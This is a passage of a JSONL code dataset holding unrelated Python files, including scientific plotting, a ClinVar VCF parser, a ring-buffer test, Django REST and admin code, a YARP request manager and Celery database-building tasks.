re.sub('.txt',\".jpg\",str(filename))\n filename1=re.sub('/V000/visible/I[0-9].jpg',\"/images/\",str(filename))\n filename1 = filename2[:5]+filename2[6:].replace(filename2[6:], \"\")+\"/images/\"\n filename=str(\"/home/fereshteh/kaist/test/\")+str(filename1)+str(filename)\n # print(filename)\n # my_dst=\"/home/fereshteh/kaist/sanitest/\"+'I' + format(j, '05d') + \".png\"\n # filename = re.sub('.jpg',\".png\",str(filename))\n my_dst=\"/home/fereshteh/kaist/sanitized_annotations1/sanitized/\"+str(filename3)\n os.rename(filename, my_dst)\n j=j+1\n print(j)\n","sub_path":"dataset-codes/exract_RGBs.py","file_name":"exract_RGBs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81334926","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\n\nX = pd.read_csv('Sample5.csv')\nX.head()\n\nlen (X)\nplt.figure(1)\nplt.title('Masa Invariante Sample 5')\n\nplt.hist(X.MT, 50,range = (0,150), color = \"red\")\nplt.xlabel('Masa Transversa $m^2=(E)^2-(p)^2$')\nplt.ylabel('Numero de eventos')\nplt.savefig('GraficaMT.jpg')\nplt.figure(2)\nplt.hist(X.TMI, 300, range = (0,100))\nplt.xlabel('Masa Transversa Invariante $m=sqrt((E)^2-(ip)^2)$')\nplt.ylabel('Numero de eventos')\nplt.savefig('GraficaMTI.jpg')\nplt.show()\n","sub_path":"Measure.py","file_name":"Measure.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"414892349","text":"#!/usr/bin/evn python3\n# -*- encoding : utf-8 -*-\n\nimport math\nEARTH_RADIUS = 6378137 #赤道半径(单位m) \n#转换为弧度(rad)\ndef rad(d):\n return d * math.pi / 180\n\n'''\n'''\ndef lantitudeLongitudeDist(lon1,lat1,lon2,lat2):\n radLon1 = rad(lon1)\n radLon2 = rad(lon2)\n radLat1 = rad(lat1)\n radLat2 = rad(lat2)\n\n if(radLat1 < 0):\n radLat1 = math.pi / 2 + math.fabs(radLat1) # south\n if(radLat1 > 0):\n radLat1 = math.pi /2 - math.fabs(radLat1) # north\n if(radLat2 < 0):\n radLat2 = math.pi / 2 + math.fabs(radLat2) # south\n if(radLat2 > 0):\n radLat2 = math.pi /2 - math.fabs(radLat2) # north\n \n if(radLon1 < 0):\n radLon1 = math.pi / 2 - math.fabs(radLon1) #west\n if(radLon2 < 0):\n radLon2 = math.pi / 2 - math.fabs(radLon2) #west\n \n x1 = EARTH_RADIUS * math.cos(radLon1) * math.sin(radLat1)\n y1 = EARTH_RADIUS * math.sin(radLon1) * math.sin(radLat1)\n z1 = EARTH_RADIUS * math.cos(radLat1)\n\n x2 = EARTH_RADIUS * math.cos(radLon2) * math.sin(radLat2)\n y2 = EARTH_RADIUS * math.sin(radLon2) * math.sin(radLat2)\n z2 = EARTH_RADIUS * math.cos(radLat2)\n\n d = math.sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2) + (z1-z2)*(z1-z2))\n\n theta = math.acos((EARTH_RADIUS*EARTH_RADIUS + EARTH_RADIUS*EARTH_RADIUS - d*d) / (2 * EARTH_RADIUS * EARTH_RADIUS))\n\n dist = theta * EARTH_RADIUS\n\n return dist\n\nif __name__ == \"__main__\":\n dist = lantitudeLongitudeDist(121.4078568,31.1684894,121.0888802,31.2924345)\n print(dist)","sub_path":"lant_lon.py","file_name":"lant_lon.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644152513","text":"address = \"\"\"\r\nMs Alice Smith\r\nApartment 1c\r\n213 Derrick Street \r\nBoston, MA 02130\r\nUSA \r\n\"\"\"\r\n\r\nfrom basics.datatypes import GetZipInfo\r\n\r\nclass ParseAddress:\r\n\r\n results = {}\r\n\r\n def find_person_name(self, lines):\r\n nlp = spacy.load('en_core_web_lg')\r\n doc = nlp(lines)\r\n for ent in doc.ents:\r\n print(ent, ent.label_)\r\n\r\n\r\n def parse(self, address):\r\n address_lines = [line for line in address.split('\\n') if line]\r\n zipobj = GetDetailsFromZip(address)\r\n city, state, zipcode = zipobj.get_details_from_zip()\r\n print(city, state, zipcode)\r\n\r\n\r\nclass GetDetailsFromZip:\r\n\r\n def __init__(self, address):\r\n self._address = address\r\n\r\n @property\r\n def address(self):\r\n return self._address\r\n\r\n def get_zipcode(self):\r\n address_list = [line for line in self.address.split('\\n') if line]\r\n for i in range(len(address_list)-1,-1,-1):\r\n line = address_list[i]\r\n words = line.split(' ')\r\n for word in words:\r\n if len(word) == 5 and word.isnumeric():\r\n return word\r\n\r\n def get_details_from_zip(self):\r\n zipcode = self.get_zipcode()\r\n zipobj = GetZipInfo()\r\n zip = zipobj.get_info_from_zip(zipcode)\r\n city = zip['city']\r\n state = zip['state']\r\n zipcode = zip['zip_code']\r\n return (city, state, zipcode)\r\n\r\n \"\"\"\r\n The below section uses spacy for further processing\r\n \"\"\"\r\n\r\n\r\n\r\no = ParseAddress()\r\no.parse(address)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"basics/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"264705397","text":"import zmq\nimport cv2\nimport sys\nimport pickle\nimport numpy as np\n\n\ndef collector_stage1(port_send, port_rec):\n print(\"Collector stage 1 started sending on port \"+port_send + \" Listening to port \" + port_rec)\n context = zmq.Context()\n # receive socket setup\n collector_receiver = context.socket(zmq.PULL)\n collector_receiver.bind(\"tcp://127.0.0.1:\"+port_rec)\n # send socket setup\n collector_sender = context.socket(zmq.PUSH)\n collector_sender.bind(\"tcp://*:\"+port_send)\n # main loop\n while True:\n # receive message\n message = pickle.loads(collector_receiver.recv())\n index, frame = message['fnumber'], message['frame']\n # saving the frames received by collector\n cv2.imwrite(\"frames_machine1/frame%d.jpeg\" % index, frame*255)\n frame = frame.astype(np.uint8)\n message = {'fnumber': index, 'frame': frame}\n collector_sender.send(pickle.dumps(message))\n\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Wrong arguments\")\n exit()\n else:\n _,port_send, port_rec = sys.argv\n collector_stage1(port_send,port_rec)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"collector_stage1.py","file_name":"collector_stage1.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"291751892","text":"from base import anor, objtest\nimport unittest\n\nclass TestDelete(unittest.TestCase):\n @objtest()\n def test_removes_position_and_velocity(self, id):\n anor.Mob(id, position=(1, 2, 3), velocity=(-5, 5, 100)).save()\n anor.Mob(id).delete()\n mob = anor.Mob.by_id(id)\n self.assertEqual(mob.id, id)\n self.assertIsNone(mob.position)\n self.assertIsNone(mob.velocity)\n","sub_path":"test/test_delete.py","file_name":"test_delete.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"528792054","text":"from django.db import transaction\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom Assets.models import Properties,GalleryPreset,ExtendedContent,ExtentedType\n\nclass PropertiesAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n\n class Meta:\n model = Properties\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(PropertiesAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\nclass ExtentedTypeAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n\n class Meta:\n model = ExtentedType\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(ExtentedTypeAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\nclass ExtendedContentAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n\n class Meta:\n model = ExtendedContent\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(ExtendedContentAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\nclass GalleryPresetForm(forms.ModelForm):\n class Meta:\n model = GalleryPreset\n widgets = {\n 'properties': forms.SelectMultiple(attrs={'size': 20})\n }\n\nclass GalleryPresetAdmin(admin.ModelAdmin):\n \"\"\"A form for creating new users. Includes all the required\n fields, plus a repeated password.\"\"\"\n form = GalleryPresetForm\n class Meta:\n model = GalleryPreset\n\n def save(self, commit=True):\n # Save the provided password in hashed format\n user = super(GalleryPresetAdmin, self).save(commit=False)\n if commit:\n user.save()\n return user\n\n\nadmin.site.register(Properties,PropertiesAdmin)\nadmin.site.register(GalleryPreset,GalleryPresetAdmin)\nadmin.site.register(ExtendedContent,ExtendedContentAdmin)\nadmin.site.register(ExtentedType,ExtentedTypeAdmin)\n","sub_path":"Core/Assets/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"206639422","text":"import logging; logger = logging.getLogger(\"morse.\" + __name__)\nimport sys\nimport yarp\nimport json\nfrom collections import OrderedDict\n\nfrom morse.core.request_manager import RequestManager, MorseRPCInvokationError\nfrom morse.core import status\n\n\nclass YarpRequestManager(RequestManager):\n \"\"\"Implements services to control the MORSE simulator over YARP\n\n The syntax of requests is:\n >>> id component_name service [params with Python syntax]\n\n 'id' is an identifier set by the client to conveniently identify\n the request. It must be less that 80 chars in [a-zA-Z0-9].\n\n The server answers:\n >>> id OK|FAIL result_in_python|error_msg\n\n \"\"\"\n\n def __str__(self):\n return \"Yarp service manager\"\n\n def initialization(self):\n\n # Create dictionaries for the input and output ports\n self._yarp_request_ports = dict()\n self._yarp_reply_ports = dict()\n # Create a dictionary for the port names\n self._component_ports = dict()\n\n # For asynchronous request, this holds the mapping between a\n # request_id and the socket which requested it.\n self._pending_ports = dict()\n\n # Stores for each port the pending results to write back.\n self._results_to_output = dict()\n\n # Create a dictionary for the evailable bottles\n self._in_bottles = dict()\n self._reply_bottles = dict()\n\n return True\n\n\n def finalization(self):\n logger.info(\"Closing yarp request ports...\")\n for port in self._yarp_request_ports.values():\n port.close()\n\n return True\n\n\n def on_service_completion(self, request_id, results):\n port = None\n\n try:\n port, id = self._pending_ports[request_id]\n except KeyError:\n logger.info(str(self) + \": ERROR: I can not find the port which requested \" + request_id)\n return\n\n if port in self._results_to_output:\n self._results_to_output[port].append((id, results))\n else:\n self._results_to_output[port] = [(id, results)]\n\n\n def post_registration(self, component_name, service, is_async):\n \"\"\" Register a connection of a service with YARP \"\"\"\n # Get the Network attribute of yarp,\n # then call its init method\n self._yarp_module = sys.modules['yarp']\n self.yarp_object = self._yarp_module.Network()\n\n # Create the names of the ports\n request_port_name = '/ors/services/{0}/request'.format(component_name)\n reply_port_name = '/ors/services/{0}/reply'.format(component_name)\n\n if not component_name in self._yarp_request_ports.keys():\n # Create the ports to accept and reply to requests\n request_port = self._yarp_module.BufferedPortBottle()\n reply_port = self._yarp_module.BufferedPortBottle()\n request_port.open(request_port_name)\n reply_port.open(reply_port_name)\n self._yarp_request_ports[component_name] = request_port\n self._yarp_reply_ports[component_name] = reply_port\n \n # Create bottles to use in the responses\n bottle_in = self._yarp_module.Bottle()\n self._in_bottles[component_name] = bottle_in\n bottle_reply = self._yarp_module.Bottle()\n self._reply_bottles[component_name] = bottle_reply\n\n logger.info(\"Yarp service manager now listening on port \" + request_port_name + \".\")\n logger.info(\"Yarp service manager will reply on port \" + reply_port_name + \".\")\n\n return True\n\n\n def main(self):\n \"\"\" Read commands from the ports, and prepare the response\"\"\" \n # Read data from available ports\n for component_name, port in self._yarp_request_ports.items():\n # Get the bottles to read and write\n bottle_in = self._in_bottles[component_name] \n bottle_reply = self._reply_bottles[component_name] \n bottle_in = port.read(False)\n if bottle_in != None:\n logger.debug(\"Received command from port '%s'\" % (component_name))\n id = 'unknown'\n\n try:\n try:\n id, component_name, service, params = self._parse_request(bottle_in)\n except ValueError: # Request contains < 2 tokens.\n raise MorseRPCInvokationError(\"Malformed request!\")\n\n logger.info(\"Got '%s | %s | %s' (id = %s) from %s\" % (component_name, service, params, id, component_name))\n\n # on_incoming_request returns either \n # (True, result) if it's a synchronous\n # request that has been immediately executed, or\n # (False, request_id) if it's an asynchronous request whose\n # termination will be notified via\n # on_service_completion.\n is_sync, value = self.on_incoming_request(component_name, service, params)\n\n if is_sync:\n if port in self._results_to_output:\n self._results_to_output[port].append((id, value))\n else:\n self._results_to_output[port] = [(id, value)]\n else:\n # Stores the mapping request/socket to notify\n # the right port when the service completes.\n # (cf :py:meth:on_service_completion)\n # Here, 'value' is the internal request id while\n # 'id' is the id used by the socket client.\n self._pending_ports[value] = (port, id)\n\n\n except MorseRPCInvokationError as e:\n if port in self._results_to_output:\n self._results_to_output[port].append((id, (status.FAILED, e.value)))\n else:\n self._results_to_output[port] = [(id, (status.FAILED, e.value))]\n \n if self._results_to_output:\n for component_name, port in self._yarp_request_ports.items():\n if port in self._results_to_output:\n for r in self._results_to_output[port]:\n response = OrderedDict([\n ('id', r[0]),\n ('status', r[1][0]),\n ('reply', (r[1][1] if r[1][1] else \"\")) ])\n #('reply', \"%s\" % str(r[1][1]) if r[1][1] else \"\") ])\n json_response = json.dumps(response)\n # Send the reply through the same yarp port\n reply_port = self._yarp_reply_ports[component_name]\n bottle_reply = reply_port.prepare()\n bottle_reply.clear()\n bottle_reply.addString(json_response)\n reply_port.write()\n logger.debug(\"Sent back '\" + str(response) + \"'. Component: \" + component_name + \". Port: \" + str(port))\n \n del self._results_to_output[port]\n\n\n def _parse_request(self, bottle):\n \"\"\"\n Parse the incoming bottle.\n \"\"\"\n try:\n request_msg = bottle.get(0).toString()\n request = json.loads(request_msg, object_pairs_hook=OrderedDict)\n except (IndexError, ValueError) as e:\n raise MorseRPCInvokationError('Malformed request: expected a json econded request with this format: \\'{id:13, component:Motion_Controller, service:goto, params:[5, 5, 0]}\\' (all values enclosed in strings)')\n\n id = request['id']\n component_name = request['component']\n service = request['service']\n try:\n params = request['params']\n import ast\n p = ast.literal_eval(params)\n except (NameError, SyntaxError) as e:\n raise MorseRPCInvokationError(\"Invalid request syntax: error while parsing the parameters. \" + str(e))\n\n return (id, component_name, service, p)\n","sub_path":"src/morse/middleware/yarp_json_request_manager.py","file_name":"yarp_json_request_manager.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"5003622","text":"## 0 - Uncertain significance, 1 - not provided, 2 - Benign, 3 - Likely benign, 4 - Likely pathogenic, 5 - Pathogenic, 6 - drug response, 7 - histocompatibility, 255 - other\ndef clnsig(inF):\n inFile = open(inF)\n ouFile = open(inF.split('.vcf')[0] + '-sig', 'w')\n ouFile2 = open(inF.split('.vcf')[0] + '-sigPatho', 'w')\n ouFile3 = open(inF.split('.vcf')[0] + '-sigPathoDrug', 'w')\n for line in inFile:\n line = line.strip()\n if line[0] != '#':\n fields = line.split('\\t')\n info = fields[7].split(';')\n Tx = []\n gene = []\n for item in info:\n if item.find('GENEINFO=') != -1:\n s = item.split('GENEINFO=')[1]\n for tm in s.split('|'):\n t = tm.split(':')[0]\n gene.append(t)\n\n if item.find('CLNSIG=') != -1:\n s = item.split('CLNSIG=')[1]\n sx = s.split('|')\n if '5' in sx:\n Tx.append('Pathogenic')\n if '4' in sx:\n Tx.append('Likely pathogenic')\n if '6' in sx:\n Tx.append('drug response')\n if '7' in sx:\n Tx.append('histocompatibility')\n if '0' in sx:\n Tx.append('Uncertain significance')\n if '1' in sx:\n Tx.append('not provided')\n if '2' in sx:\n Tx.append('Benign')\n if '3' in sx:\n Tx.append('Likely benign')\n if '255' in sx:\n Tx.append('other')\n\n TxPatho = []\n TxPathoDrug = []\n \n for it in Tx:\n #if it != 'other' and it != 'Uncertain significance' and it!='not provided' and it != 'Benign' and it!='Likely benign':\n if it.find('Pathogenic') != -1 or it.find('pathogenic') != -1 or it.find('drug') != -1 or it.find('histocompatibility') != -1:\n if it not in TxPathoDrug:\n TxPathoDrug.append(it)\n\n for it in Tx:\n if it.find('Pathogenic') != -1: \n TxPatho.append(it)\n elif it.find('Likely pathogenic') != -1 and 'Pathogenic' not in TxPatho:\n TxPatho.append(it)\n \n if gene:\n ouFile.write('\\t'.join(fields[0:5]) + '\\t' + ':'.join(gene) + '\\t' + ';'.join(Tx) + '\\n')\n else:\n ouFile.write('\\t'.join(fields[0:5]) + '\\t' + '.' + '\\t' + ';'.join(Tx) + '\\n')\n\n if gene and TxPatho:\n ouFile2.write('\\t'.join(fields[0:5]) + '\\t' + ':'.join(gene) + '\\t' + ';'.join(TxPatho) + '\\n')\n elif TxPatho:\n ouFile2.write('\\t'.join(fields[0:5]) + '\\t' + '.' + '\\t' + ';'.join(TxPatho) + '\\n')\n\n if gene and TxPathoDrug:\n ouFile3.write('\\t'.join(fields[0:5]) + '\\t' + ':'.join(gene) + '\\t' + ';'.join(TxPathoDrug) + '\\n')\n elif TxPathoDrug:\n ouFile3.write('\\t'.join(fields[0:5]) + '\\t' + '.' + '\\t' + ';'.join(TxPathoDrug) + '\\n')\n\n\n\n\n inFile.close()\n ouFile.close()\n ouFile2.close()\n\n#clnsig('clinvar.vcf')\n#clnsig('GRCh38.clinvar.vcf')\nclnsig('GRCh37.clinvar.vcf')\n","sub_path":"Data/Clinvar/OldVer/01-CLNSIG.py","file_name":"01-CLNSIG.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"309737191","text":"import unittest\nfrom lib.RingBuffer import RingBuffer\nimport numpy as np\n\nclass TestRingBuffer(unittest.TestCase):\n\n def setUp(self):\n self.q = RingBuffer(11)\n self.a = np.zeros((1,12))\n \n def test_isEmpty(self):\n self.assertTrue(self.q.isEmapty())\n self.q.enqueue(1) \n self.assertFalse(self.q.isEmapty())\n\n def test_isFull(self):\n self.assertFalse(self.q.isFull())\n self.q.enqueue(1)\n self.assertFalse(self.q.isFull())\n for i in range(10):\n self.q.enqueue(i)\n self.assertTrue(self.q.isFull())\n\n def test_enqueue(self):\n self.a[0][0] = 1\n self.q.enqueue(1)\n # print(self.a[0])\n #\n # print(self.a[0] == self.q.getQueue())\n result = True\n for BoolValue in (self.a[0] == self.q.getQueue()):\n if BoolValue != True:\n result = False\n break\n self.assertTrue(result)\n for i in range(10):\n self.q.enqueue(i)\n self.assertEqual(\"queue overflow\", self.q.enqueue(1))\n\n def test_dequeue(self):\n self.q.enqueue(1)\n self.assertEqual(1, self.q.dequeue())\n self.assertEqual(\"queue underflow\", self.q.dequeue())\n\n def test_size(self):\n self.assertEqual(0, self.q.size())\n for i in range(11):\n self.q.enqueue(i)\n self.assertEqual(i+1, self.q.size())\n for i in range(11):\n i = 11 - i\n self.q.dequeue()\n self.assertEqual(i, self.q.size())\n def test_peek(self):\n self.q.enqueue(1)\n self.q.assertEqual(1, self.q.peek())\n self.q.assertEqual(1, self.q.dequeue())\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_ringbuffer.py","file_name":"test_ringbuffer.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134007347","text":"# -*- coding: utf-8 -*-\n\nimport dsp\nimport matplotlib.pylab as plt\n\n# Sampling Example\n\n# Simulation\nsim = dsp.simulation(500E-6,1E-6,0)\n\n# Sampling\nsm = dsp.sampling(50E3,0E-6,sim.duration,sim.res)\n\n# Waveform\nwavef = dsp.waveform()\n\n# Noise\nns = dsp.signal_info()\nns.snr = 1/5\nns.amp = 1\n\n# Sine\ns1 = dsp.signal_info()\ns1.amp = 5\ns1.freq = 10E3\ns1.phase = 0\n\n# Sampling signal\nsignal = wavef.sine(sim.t,s1.amp,s1.freq,s1.phase) + wavef.noise(ns.amp,len(sim.t))\ndigital_signal = sm.sample_signal(signal)\n\n# Plot\nplt.plot(sim.t,signal,'g',sm.t,digital_signal,'ro')\nplt.show()","sub_path":"Python/Sampling_Example.py","file_name":"Sampling_Example.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"335097754","text":"import requests\nimport json\nfrom requests_kerberos import HTTPKerberosAuth, REQUIRED\n\nAPI_ENDPOINT = 'https://10.0.10.133:8999/batches'\n\nheaders = {\n 'Content-Type': 'application/json'\n}\ndata2 = open('job.json')\njson_data = json.load(data2)\nr = requests.post(url=API_ENDPOINT, data=json.dumps(json_data), headers=headers, auth=HTTPKerberosAuth(mutual_authentication=REQUIRED, sanitize_mutual_error_response=False), verify=False)\n\n\n#r = requests.post(url=API_ENDPOINT, data=json.dumps(json_data), headers=headers, verify=False, auth=HTTPKerberosAuth())\n#r = requests.post(url=API_ENDPOINT, data=json.dumps(json_data), headers=headers, verify=True, auth=HTTPKerberosAuth(), cert=['/home/user/yang2/livy.crt'])\n\nprint(r.text)\n","sub_path":"python/yang2/post_work_ssl.py","file_name":"post_work_ssl.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446699191","text":"letter = 'é'\nfrom os import path\nfrom os import listdir\nfrom os.path import isfile, join\n\nlocale = path.dirname(__file__)\n\ndef encode():\n onlyfiles = [f for f in listdir(locale) if f != \"xml.py\" if isfile(join(locale, f))]\n for i in onlyfiles:\n lst = []\n outfolder = locale + \"\\edited\" + \"\\\\\"\n f = open(i)\n outfile = open(outfolder + i[1:], \"w\")\n for d in f:\n outfile.write(d.replace(letter, \"e\"))\n outfile.close()\n f.close()\n\n#print(locale)\n\nencode()\n","sub_path":"Latest-Distrubution/Assets/Base/Dex/move_data/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"218254556","text":"import datetime\r\nimport os\r\nimport pham.db\r\nimport pham.query\r\nfrom contextlib import closing\r\nfrom webphamerator.app import app, db, models, celery\r\n\r\nclass CallbackObserver(object):\r\n def __init__(self, job_id):\r\n self.job_id = job_id\r\n\r\n def handle_call(self, code, *args, **kwargs):\r\n job_record = db.session.query(models.Job).filter(models.Job.id == self.job_id).first()\r\n if code == pham.db.CallbackCode.status:\r\n message = args[0]\r\n step = args[1]\r\n total_steps = args[2]\r\n job_record.status_message = '{} ({}/{})'.format(message, step, total_steps)\r\n else:\r\n # only report the first error\r\n if job_record.status_code != 'failed':\r\n message = pham.db.message_for_callback(code, *args, **kwargs)\r\n job_record.status_message = message\r\n job_record.status_code = 'failed'\r\n db.session.commit()\r\n\r\n\r\nclass CreateDatabase(celery.Task):\r\n\r\n def _get_server(self):\r\n return pham.db.DatabaseServer.from_url(app.config['SQLALCHEMY_DATABASE_URI'])\r\n\r\n def _get_job(self, job_id):\r\n return db.session.query(models.Job).filter(models.Job.id == job_id).first()\r\n\r\n def _get_database(self, database_id):\r\n return db.session.query(models.Database).filter(models.Database.id == database_id).first()\r\n\r\n def run(self, job_id):\r\n # get job record from the database\r\n job_record = self._get_job(job_id)\r\n database_record = self._get_database(job_record.database_id)\r\n job_record.start_time = datetime.datetime.utcnow()\r\n job_record.modified = datetime.datetime.utcnow()\r\n job_record.seen = False\r\n job_record.status_code = 'running'\r\n job_record.task_id = self.request.id\r\n\r\n genbank_paths = [r.filename for r in job_record.genbank_files_to_add.all()]\r\n organims_ids = [r.organims_id for r in job_record.organism_ids_to_delete.all()]\r\n\r\n # update database with status, status_message, start_time, modified\r\n db.session.commit()\r\n\r\n observer = CallbackObserver(job_id)\r\n success = pham.db.create(self._get_server(), database_record.mysql_name(),\r\n genbank_files=genbank_paths,\r\n cdd_search=database_record.cdd_search,\r\n callback=observer.handle_call)\r\n if not success:\r\n raise RuntimeError\r\n\r\n # export database dump\r\n path = os.path.join(app.config['DATABASE_DUMP_DIR'], database_record.name_slug)\r\n # delete old dump\r\n try:\r\n os.remove(path + '.sql')\r\n except OSError:\r\n pass\r\n try:\r\n os.remove(path + '.md5sum')\r\n except OSError:\r\n pass\r\n try:\r\n os.remove(path + '.version')\r\n except OSError:\r\n pass\r\n\r\n pham.db.export(self._get_server(), database_record.mysql_name(), path + '.sql')\r\n\r\n def on_failure(self, exc, task_id, args, kwargs, einfo):\r\n job_id = args[0]\r\n job_record = self._get_job(job_id)\r\n database_record = self._get_database(job_record.database_id)\r\n if job_record.status_code != 'failed':\r\n job_record.status_code = 'failed'\r\n job_record.status_message = 'An unexpected error occurred.'\r\n\r\n if not isinstance(exc, pham.db.DatabaseAlreadyExistsError):\r\n pham.db.delete(self._get_server(), database_record.mysql_name())\r\n db.session.delete(database_record)\r\n\r\n self.always(job_record)\r\n\r\n def on_success(self, return_value, task_id, args, kwargs):\r\n job_id = args[0]\r\n job_record = self._get_job(job_id)\r\n database_record = self._get_database(job_record.database_id)\r\n job_record.status_code = 'success'\r\n job_record.status_message = 'Database created.'\r\n\r\n database_record.visible = True\r\n database_record.locked = False\r\n database_record.created = datetime.datetime.utcnow()\r\n database_record.modified = datetime.datetime.utcnow()\r\n server = pham.db.DatabaseServer.from_url(app.config['SQLALCHEMY_DATABASE_URI'])\r\n with closing(server.get_connection(database=database_record.mysql_name())) as cnx:\r\n database_record.number_of_organisms = pham.query.count_phages(cnx)\r\n database_record.number_of_phams = pham.query.count_phams(cnx)\r\n\r\n self.always(job_record)\r\n\r\n def always(self, job_record):\r\n if job_record.start_time is None:\r\n job_record.runtime = datetime.datetime.utcnow() - job_record.modified\r\n else:\r\n job_record.runtime = datetime.datetime.utcnow() - job_record.start_time\r\n job_record.modified = datetime.datetime.utcnow()\r\n job_record.seen = False\r\n\r\n # delete genbank files\r\n for file_record in job_record.genbank_files_to_add.all():\r\n try:\r\n os.remove(file_record.filename)\r\n except IOError:\r\n pass\r\n file_record.filename = None\r\n\r\n db.session.commit()\r\n","sub_path":"webphamerator/app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255041932","text":"import tempfile\n\nimport requests\n\nfrom django.http import Http404\nfrom rest_framework import status, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom substrapp.models import Algo\nfrom substrapp.serializers import LedgerAlgoSerializer, AlgoSerializer\nfrom substrapp.utils import queryLedger, get_hash\nfrom substrapp.views.utils import get_filters, getObjectFromLedger, ComputeHashMixin, ManageFileMixin, JsonException, find_primary_key_error\n\n\nclass AlgoViewSet(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n ComputeHashMixin,\n ManageFileMixin,\n GenericViewSet):\n queryset = Algo.objects.all()\n serializer_class = AlgoSerializer\n ledger_query_call = 'queryAlgo'\n\n def perform_create(self, serializer):\n return serializer.save()\n\n def create(self, request, *args, **kwargs):\n data = request.data\n\n file = data.get('file')\n pkhash = get_hash(file)\n serializer = self.get_serializer(data={\n 'pkhash': pkhash,\n 'file': file,\n 'description': data.get('description')\n })\n\n try:\n serializer.is_valid(raise_exception=True)\n except Exception as e:\n st = status.HTTP_400_BAD_REQUEST\n if find_primary_key_error(e):\n st = status.HTTP_409_CONFLICT\n return Response({'message': e.args, 'pkhash': pkhash}, status=st)\n else:\n\n # create on db\n try:\n instance = self.perform_create(serializer)\n except Exception as exc:\n return Response({'message': exc.args},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n # init ledger serializer\n ledger_serializer = LedgerAlgoSerializer(data={'name': data.get('name'),\n 'permissions': data.get('permissions', 'all'),\n 'instance': instance},\n context={'request': request})\n if not ledger_serializer.is_valid():\n # delete instance\n instance.delete()\n raise ValidationError(ledger_serializer.errors)\n\n # create on ledger\n data, st = ledger_serializer.create(ledger_serializer.validated_data)\n\n if st not in (status.HTTP_201_CREATED, status.HTTP_202_ACCEPTED, status.HTTP_408_REQUEST_TIMEOUT):\n return Response(data, status=st)\n\n headers = self.get_success_headers(serializer.data)\n d = dict(serializer.data)\n d.update(data)\n return Response(d, status=st, headers=headers)\n\n def create_or_update_algo(self, algo, pk):\n try:\n # get algo description from remote node\n url = algo['description']['storageAddress']\n try:\n r = requests.get(url, headers={'Accept': 'application/json;version=0.0'}) # TODO pass cert\n except:\n raise Exception(f'Failed to fetch {url}')\n else:\n if r.status_code != 200:\n raise Exception(f'end to end node report {r.text}')\n\n try:\n computed_hash = self.compute_hash(r.content)\n except Exception:\n raise Exception('Failed to fetch description file')\n else:\n if computed_hash != algo['description']['hash']:\n msg = 'computed hash is not the same as the hosted file. Please investigate for default of synchronization, corruption, or hacked'\n raise Exception(msg)\n\n f = tempfile.TemporaryFile()\n f.write(r.content)\n\n # save/update objective in local db for later use\n instance, created = Algo.objects.update_or_create(pkhash=pk, validated=True)\n instance.description.save('description.md', f)\n except Exception as e:\n raise e\n else:\n return instance\n\n def retrieve(self, request, *args, **kwargs):\n lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field\n pk = self.kwargs[lookup_url_kwarg]\n\n if len(pk) != 64:\n return Response({'message': f'Wrong pk {pk}'}, status.HTTP_400_BAD_REQUEST)\n\n try:\n int(pk, 16) 